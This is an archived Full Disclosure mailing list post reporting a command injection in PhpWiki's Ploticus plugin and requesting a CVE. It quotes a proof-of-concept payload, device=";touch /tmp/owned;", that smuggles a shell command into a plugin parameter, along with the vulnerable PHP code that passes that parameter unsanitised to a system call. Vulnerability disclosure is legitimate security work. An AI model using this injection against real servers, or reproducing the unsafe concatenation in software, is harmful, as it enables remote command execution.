Full Disclosure mailing list archives
PHP-Wiki Command Injection
From: "Benjamin Harris" <bch () hush ai>
Date: Wed, 27 Aug 2014 23:23:45 +0100
Hi All OSS-Security, can I get a CVE for this please? URL: https://sourceforge.net/projects/phpwiki/ I tried to report this a month ago, but got no response from the developers. This is an old vulnerability I found while dusting off some old hard drives. Brief: ------------------------- PhpWiki is a WikiWikiWeb clone in PHP. A WikiWikiWeb is a site where anyone can edit the pages through an HTML form. Multiple storage backends, dynamic hyperlinking, themeable, scriptable by plugins, full authentication, ACL's. Details: -------------------------- Straight command injection in the Ploticus module. Attached is a working POC. I found these notes I made: <<Ploticus device=";touch /tmp/owned;" -prefab= -csmap= data= alt= help= >> $ ls -la owned -rw-r--r-- 1 apache apache 0 Jan 18 15:23 owned vuln code with system execute at the bottom controllable param is $args $gif = $argarray['device']; $args = "-$gif -o $tempfile.$gif"; $code = $this->execute(PLOTICUS_EXE . " $tempfile.plo $args", $tempfile.".$gif"); ['device'] is listed as an option by user when using the Politus plugin " example usage; <?plugin Ploticus device||=png [ploticus options...] multiline ploticus script ... ?> :>> function getImage($dbi, $argarray, $request) { //extract($this->getArgs($argstr, $request)); //extract($argarray); $source =& $this->source; if (!empty($source)) { if ($this->withShellCommand($source)) { $this->_errortext .= _("shell commands not allowed in Ploticus"); return false; } if (is_array($argarray['data'])) { // support <!plugin- list !> pagelists $src = "#proc getdata\ndata:"; $i = 0; foreach ($argarray['data'] as $data) { // hash or array? if (is_array($data)) $src .= ("\t" . join(" ", $data) . "\n"); else $src .= ("\t" . '"' . $data . '" ' . $i++ . "\n"); } $src .= $source; $source = $src; } $tempfile = $this->tempnam('Ploticus','plo'); @unlink($tempfile); $gif = $argarray['device']; $args = "-$gif -o $tempfile.$gif"; if (!empty($argarray['-csmap'])) { $args .= " -csmap -mapfile $tempfile.map"; $this->_mapfile = "$tempfile.map"; } if (!empty($argarray['-prefab'])) { //check $_ENV['PLOTICUS_PREFABS'] and default directory global $HTTP_ENV_VARS; if (empty($HTTP_ENV_VARS['PLOTICUS_PREFABS'])) { if (file_exists("/usr/share/ploticus")) $HTTP_ENV_VARS['PLOTICUS_PREFABS'] = "/usr/share/ploticus"; elseif (defined('PLOTICUS_PREFABS')) $HTTP_ENV_VARS['PLOTICUS_PREFABS'] = constant('PLOTICUS_PREFABS'); } $args .= (" -prefab " . $argarray['-prefab']); } if (isWindows()) { $fp = fopen("$tempfile.plo", "w"); fwrite ($fp, $source); fclose($fp); $code = $this->execute(PLOTICUS_EXE . " $tempfile.plo $args", $tempfile.".$gif"); Many thanks, Ben
Attachment:
release.py
Description:
_______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- PHP-Wiki Command Injection Benjamin Harris (Aug 27)